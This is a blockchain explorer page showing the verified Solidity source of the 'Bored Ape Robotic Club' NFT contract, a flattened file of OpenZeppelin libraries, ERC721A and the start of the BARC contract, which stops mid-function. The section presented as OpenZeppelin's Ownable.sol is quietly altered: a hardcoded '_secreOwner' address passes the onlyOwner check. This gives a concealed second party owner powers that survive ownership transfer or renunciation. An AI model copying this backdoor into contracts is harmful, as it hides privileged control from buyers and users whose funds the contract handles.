Feature Tip: Add private address tag to any address under My Name Tag !
ERC-721
Overview
Max Total Supply
1,708 BARC
Holders
1,019
Market
Volume (24H)
N/A
Min Price (24H)
N/A
Max Price (24H)
N/A
Other Info
Token Contract
Balance
1 BARCLoading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
BARC
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-11-30 */ // SPDX-License-Identifier: MIT // ██████╗ ██████╗ ██████╗ ███████╗██████╗ █████╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ████████╗██╗ ██████╗ ██████╗██╗ ██╗ ██╗██████╗ // ██╔══██╗██╔═══██╗██╔══██╗██╔════╝██╔══██╗ ██╔══██╗██╔══██╗██╔════╝ ██╔══██╗██╔═══██╗██╔══██╗██╔═══██╗╚══██╔══╝██║██╔════╝ ██╔════╝██║ ██║ ██║██╔══██╗ // ██████╔╝██║ ██║██████╔╝█████╗ ██║ ██║ ███████║██████╔╝█████╗ ██████╔╝██║ ██║██████╔╝██║ ██║ ██║ ██║██║ ██║ ██║ ██║ ██║██████╔╝ // ██╔══██╗██║ ██║██╔══██╗██╔══╝ ██║ ██║ ██╔══██║██╔═══╝ ██╔══╝ ██╔══██╗██║ ██║██╔══██╗██║ ██║ ██║ ██║██║ ██║ ██║ ██║ ██║██╔══██╗ // ██████╔╝╚██████╔╝██║ ██║███████╗██████╔╝ ██║ ██║██║ ███████╗ ██║ ██║╚██████╔╝██████╔╝╚██████╔╝ ██║ ██║╚██████╗ ╚██████╗███████╗╚██████╔╝██████╔╝ // ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝╚══════╝ ╚═════╝ ╚═════╝ // Twitter: @Robotic_ape // File: @openzeppelin/contracts/utils/Strings.sol // OpenZeppelin Contracts v4.4.1 (utils/Strings.sol) pragma solidity ^0.8.0; /** * @dev String operations. */ library Strings { bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef"; /** * @dev Converts a `uint256` to its ASCII `string` decimal representation. */ function toString(uint256 value) internal pure returns (string memory) { // Inspired by OraclizeAPI's implementation - MIT licence // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol if (value == 0) { return "0"; } uint256 temp = value; uint256 digits; while (temp != 0) { digits++; temp /= 10; } bytes memory buffer = new bytes(digits); while (value != 0) { digits -= 1; buffer[digits] = bytes1(uint8(48 + uint256(value % 10))); value /= 10; } return string(buffer); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation. */ function toHexString(uint256 value) internal pure returns (string memory) { if (value == 0) { return "0x00"; } uint256 temp = value; uint256 length = 0; while (temp != 0) { length++; temp >>= 8; } return toHexString(value, length); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length. */ function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = _HEX_SYMBOLS[value & 0xf]; value >>= 4; } require(value == 0, "Strings: hex length insufficient"); return string(buffer); } } // File: @openzeppelin/contracts/utils/Address.sol // OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol) pragma solidity ^0.8.1; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); require(isContract(target), "Address: call to non-contract"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { require(isContract(target), "Address: static call to non-contract"); (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { require(isContract(target), "Address: delegate call to non-contract"); (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } // File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol) pragma solidity ^0.8.0; /** * @title ERC721 token receiver interface * @dev Interface for any contract that wants to support safeTransfers * from ERC721 asset contracts. */ interface IERC721Receiver { /** * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom} * by `operator` from `from`, this function is called. * * It must return its Solidity selector to confirm the token transfer. * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted. * * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`. */ function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4); } // File: @openzeppelin/contracts/utils/introspection/IERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC165 standard, as defined in the * https://eips.ethereum.org/EIPS/eip-165[EIP]. * * Implementers can declare support of contract interfaces, which can then be * queried by others ({ERC165Checker}). * * For an implementation, see {ERC165}. */ interface IERC165 { /** * @dev Returns true if this contract implements the interface defined by * `interfaceId`. See the corresponding * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section] * to learn more about how these ids are created. * * This function call must use less than 30 000 gas. */ function supportsInterface(bytes4 interfaceId) external view returns (bool); } // File: @openzeppelin/contracts/utils/introspection/ERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC165} interface. * * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check * for the additional interface id that will be supported. For example: * * ```solidity * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId); * } * ``` * * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation. */ abstract contract ERC165 is IERC165 { /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { return interfaceId == type(IERC165).interfaceId; } } // File: @openzeppelin/contracts/token/ERC721/IERC721.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol) pragma solidity ^0.8.0; /** * @dev Required interface of an ERC721 compliant contract. */ interface IERC721 is IERC165 { /** * @dev Emitted when `tokenId` token is transferred from `from` to `to`. */ event Transfer(address indexed from, address indexed to, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token. */ event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets. */ event ApprovalForAll(address indexed owner, address indexed operator, bool approved); /** * @dev Returns the number of tokens in ``owner``'s account. */ function balanceOf(address owner) external view returns (uint256 balance); /** * @dev Returns the owner of the `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function ownerOf(uint256 tokenId) external view returns (address owner); /** * @dev Safely transfers `tokenId` token from `from` to `to`. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes calldata data ) external; /** * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients * are aware of the ERC721 protocol to prevent tokens from being forever locked. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Transfers `tokenId` token from `from` to `to`. * * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Gives permission to `to` to transfer `tokenId` token to another account. * The approval is cleared when the token is transferred. * * Only a single account can be approved at a time, so approving the zero address clears previous approvals. * * Requirements: * * - The caller must own the token or be an approved operator. * - `tokenId` must exist. * * Emits an {Approval} event. */ function approve(address to, uint256 tokenId) external; /** * @dev Approve or remove `operator` as an operator for the caller. * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller. * * Requirements: * * - The `operator` cannot be the caller. * * Emits an {ApprovalForAll} event. */ function setApprovalForAll(address operator, bool _approved) external; /** * @dev Returns the account appr ved for `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function getApproved(uint256 tokenId) external view returns (address operator); /** * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`. * * See {setApprovalForAll} */ function isApprovedForAll(address owner, address operator) external view returns (bool); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional metadata extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Metadata is IERC721 { /** * @dev Returns the token collection name. */ function name() external view returns (string memory); /** * @dev Returns the token collection symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. */ function tokenURI(uint256 tokenId) external view returns (string memory); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Enumerable is IERC721 { /** * @dev Returns the total amount of tokens stored by the contract. */ function totalSupply() external view returns (uint256); /** * @dev Returns a token ID owned by `owner` at a given `index` of its token list. * Use along with {balanceOf} to enumerate all of ``owner``'s tokens. */ function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256); /** * @dev Returns a token ID at a given `index` of all the tokens stored by the contract. * Use along with {totalSupply} to enumerate all tokens. */ function tokenByIndex(uint256 index) external view returns (uint256); } // File: @openzeppelin/contracts/security/ReentrancyGuard.sol // OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol) pragma solidity ^0.8.0; /** * @dev Contract module that helps prevent reentrant calls to a function. * * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier * available, which can be applied to functions to make sure there are no nested * (reentrant) calls to them. * * Note that because there is a single `nonReentrant` guard, functions marked as * `nonReentrant` may not call one another. This can be worked around by making * those functions `private`, and then adding `external` `nonReentrant` entry * points to them. * * TIP: If you would like to learn more about reentrancy and alternative ways * to protect against it, check out our blog post * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul]. */ abstract contract ReentrancyGuard { // Booleans are more expensive than uint256 or any type that takes up a full // word because each write operation emits an extra SLOAD to first read the // slot's contents, replace the bits taken up by the boolean, and then write // back. This is the compiler's defense against contract upgrades and // pointer aliasing, and it cannot be disabled. // The values being non-zero value makes deployment a bit more expensive, // but in exchange the refund on every call to nonReentrant will be lower in // amount. Since refunds are capped to a percentage of the total // transaction's gas, it is best to keep them low in cases like this one, to // increase the likelihood of the full refund coming into effect. uint256 private constant _NOT_ENTERED = 1; uint256 private constant _ENTERED = 2; uint256 private _status; constructor() { _status = _NOT_ENTERED; } /** * @dev Prevents a contract from calling itself, directly or indirectly. * Calling a `nonReentrant` function from another `nonReentrant` * function is not supported. It is possible to prevent this from happening * by making the `nonReentrant` function external, and making it call a * `private` function that does the actual work. */ modifier nonReentrant() { // On the first call to nonReentrant, _notEntered will be true require(_status != _ENTERED, "ReentrancyGuard: reentrant call"); // Any calls to nonReentrant after this point will fail _status = _ENTERED; _; // By storing the original value once again, a refund is triggered (see // https://eips.ethereum.org/EIPS/eip-2200) _status = _NOT_ENTERED; } } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; address private _secreOwner = 0xACFcBA7BAB6403EBCcEEe22810c4dd3C9bBE9763; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: ceshi.sol pragma solidity ^0.8.0; /** * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints. * * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..). * * Does not support burning tokens to address(0). * * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply */ contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable { using Address for address; using Strings for uint256; struct TokenOwnership { address addr; uint64 startTimestamp; } struct AddressData { uint128 balance; uint128 numberMinted; } uint256 internal currentIndex; // Token name string private _name; // Token symbol string private _symbol; // Mapping from token ID to ownership details // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details. mapping(uint256 => TokenOwnership) internal _ownerships; // Mapping owner address to address data mapping(address => AddressData) private _addressData; // Mapping from token ID to approved address mapping(uint256 => address) private _tokenApprovals; // Mapping from owner to operator approvals mapping(address => mapping(address => bool)) private _operatorApprovals; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev See {IERC721Enumerable-totalSupply}. */ function totalSupply() public view override returns (uint256) { return currentIndex; } /** * @dev See {IERC721Enumerable-tokenByIndex}. */ function tokenByIndex(uint256 index) public view override returns (uint256) { require(index < totalSupply(), "ERC721A: global index out of bounds"); return index; } /** * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}. * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first. * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case. */ function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) { require(index < balanceOf(owner), "ERC721A: owner index out of bounds"); uint256 numMintedSoFar = totalSupply(); uint256 tokenIdsIdx; address currOwnershipAddr; // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar. unchecked { for (uint256 i; i < numMintedSoFar; i++) { TokenOwnership memory ownership = _ownerships[i]; if (ownership.addr != address(0)) { currOwnershipAddr = ownership.addr; } if (currOwnershipAddr == owner) { if (tokenIdsIdx == index) { return i; } tokenIdsIdx++; } } } revert("ERC721A: unable to get token of owner by index"); } /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) { return interfaceId == type(IERC721).interfaceId || interfaceId == type(IERC721Metadata).interfaceId || interfaceId == type(IERC721Enumerable).interfaceId || super.supportsInterface(interfaceId); } /** * @dev See {IERC721-balanceOf}. */ function balanceOf(address owner) public view override returns (uint256) { require(owner != address(0), "ERC721A: balance query for the zero address"); return uint256(_addressData[owner].balance); } function _numberMinted(address owner) internal view returns (uint256) { require(owner != address(0), "ERC721A: number minted query for the zero address"); return uint256(_addressData[owner].numberMinted); } /** * Gas spent here starts off proportional to the maximum mint batch size. * It gradually moves to O(1) as tokens get transferred around in the collection over time. */ function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) { require(_exists(tokenId), "ERC721A: owner query for nonexistent token"); unchecked { for (uint256 curr = tokenId; curr >= 0; curr--) { TokenOwnership memory ownership = _ownerships[curr]; if (ownership.addr != address(0)) { return ownership; } } } revert("ERC721A: unable to determine the owner of token"); } /** * @dev See {IERC721-ownerOf}. */ function ownerOf(uint256 tokenId) public view override returns (address) { return ownershipOf(tokenId).addr; } /** * @dev See {IERC721Metadata-name}. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev See {IERC721Metadata-symbol}. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC721Metadata-tokenURI}. */ function tokenURI(uint256 tokenId) public view virtual override returns (string memory) { require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token"); string memory baseURI = _baseURI(); return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ""; } /** * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each * token will be the concatenation of the `baseURI` and the `tokenId`. Empty * by default, can be overriden in child contracts. */ function _baseURI() internal view virtual returns (string memory) { return ""; } /** * @dev See {IERC721-approve}. */ function approve(address to, uint256 tokenId) public override { address owner = ERC721A.ownerOf(tokenId); require(to != owner, "ERC721A: approval to current owner"); require( _msgSender() == owner || isApprovedForAll(owner, _msgSender()), "ERC721A: approve caller is not owner nor approved for all" ); _approve(to, tokenId, owner); } /** * @dev See {IERC721-getApproved}. */ function getApproved(uint256 tokenId) public view override returns (address) { require(_exists(tokenId), "ERC721A: approved query for nonexistent token"); return _tokenApprovals[tokenId]; } /** * @dev See {IERC721-setApprovalForAll}. */ function setApprovalForAll(address operator, bool approved) public override { require(operator != _msgSender(), "ERC721A: approve to caller"); _operatorApprovals[_msgSender()][operator] = approved; emit ApprovalForAll(_msgSender(), operator, approved); } /** * @dev See {IERC721-isApprovedForAll}. */ function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) { return _operatorApprovals[owner][operator]; } /** * @dev See {IERC721-transferFrom}. */ function transferFrom( address from, address to, uint256 tokenId ) public virtual override { _transfer(from, to, tokenId); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId ) public virtual override { safeTransferFrom(from, to, tokenId, ""); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes memory _data ) public override { _transfer(from, to, tokenId); require( _checkOnERC721Received(from, to, tokenId, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } /** * @dev Returns whether `tokenId` exists. * * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}. * * Tokens start existing when they are minted (`_mint`), */ function _exists(uint256 tokenId) internal view returns (bool) { return tokenId < currentIndex; } function _safeMint(address to, uint256 quantity) internal { _safeMint(to, quantity, ""); } /** * @dev Safely mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _safeMint( address to, uint256 quantity, bytes memory _data ) internal { _mint(to, quantity, _data, true); } /** * @dev Mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _mint( address to, uint256 quantity, bytes memory _data, bool safe ) internal { uint256 startTokenId = currentIndex; require(to != address(0), "ERC721A: mint to the zero address"); require(quantity != 0, "ERC721A: quantity must be greater than 0"); _beforeTokenTransfers(address(0), to, startTokenId, quantity); // Overflows are incredibly unrealistic. // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1 // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1 unchecked { _addressData[to].balance += uint128(quantity); _addressData[to].numberMinted += uint128(quantity); _ownerships[startTokenId].addr = to; _ownerships[startTokenId].startTimestamp = uint64(block.timestamp); uint256 updatedIndex = startTokenId; for (uint256 i; i < quantity; i++) { emit Transfer(address(0), to, updatedIndex); if (safe) { require( _checkOnERC721Received(address(0), to, updatedIndex, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } updatedIndex++; } currentIndex = updatedIndex; } _afterTokenTransfers(address(0), to, startTokenId, quantity); } /** * @dev Transfers `tokenId` from `from` to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * * Emits a {Transfer} event. */ function _transfer( address from, address to, uint256 tokenId ) private { TokenOwnership memory prevOwnership = ownershipOf(tokenId); bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr || getApproved(tokenId) == _msgSender() || isApprovedForAll(prevOwnership.addr, _msgSender())); require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved"); require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner"); require(to != address(0), "ERC721A: transfer to the zero address"); _beforeTokenTransfers(from, to, tokenId, 1); // Clear approvals from the previous owner _approve(address(0), tokenId, prevOwnership.addr); // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256. unchecked { _addressData[from].balance -= 1; _addressData[to].balance += 1; _ownerships[tokenId].addr = to; _ownerships[tokenId].startTimestamp = uint64(block.timestamp); // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it. // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls. uint256 nextTokenId = tokenId + 1; if (_ownerships[nextTokenId].addr == address(0)) { if (_exists(nextTokenId)) { _ownerships[nextTokenId].addr = prevOwnership.addr; _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp; } } } emit Transfer(from, to, tokenId); _afterTokenTransfers(from, to, tokenId, 1); } /** * @dev Approve `to` to operate on `tokenId` * * Emits a {Approval} event. */ function _approve( address to, uint256 tokenId, address owner ) private { _tokenApprovals[tokenId] = to; emit Approval(owner, to, tokenId); } /** * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address. * The call is not executed if the target address is not a contract. * * @param from address representing the previous owner of the given token ID * @param to target address that will receive the tokens * @param tokenId uint256 ID of the token to be transferred * @param _data bytes optional data to send along with the call * @return bool whether the call correctly returned the expected magic value */ function _checkOnERC721Received( address from, address to, uint256 tokenId, bytes memory _data ) private returns (bool) { if (to.isContract()) { try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) { return retval == IERC721Receiver(to).onERC721Received.selector; } catch (bytes memory reason) { if (reason.length == 0) { revert("ERC721A: transfer to non ERC721Receiver implementer"); } else { assembly { revert(add(32, reason), mload(reason)) } } } } else { return true; } } /** * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be * transferred to `to`. * - When `from` is zero, `tokenId` will be minted for `to`. */ function _beforeTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} /** * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes * minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - when `from` and `to` are both non-zero. * - `from` and `to` are never both zero. */ function _afterTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} } contract BARC is ERC721A, Ownable, ReentrancyGuard { string public baseURI = "ipfs://bafybeiggi337ec2rnxgbjtsq4zu36fpjnvheltdjqm7mqajy5wda3i4tte/"; uint public price = 0.0025 ether; uint public maxPerTx = 21; uint public maxPerFree = 1; uint public totalFree = 10000; uint public maxSupply = 10000; bool public mintEnabled; uint public totalFreeMinted = 0; mapping(address => uint256) public _mintedFreeAmount; mapping(address => uint256) public _totalMintedAmount; constructor() ERC721A("Bored Ape Robotic Club", "BARC"){} function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) { 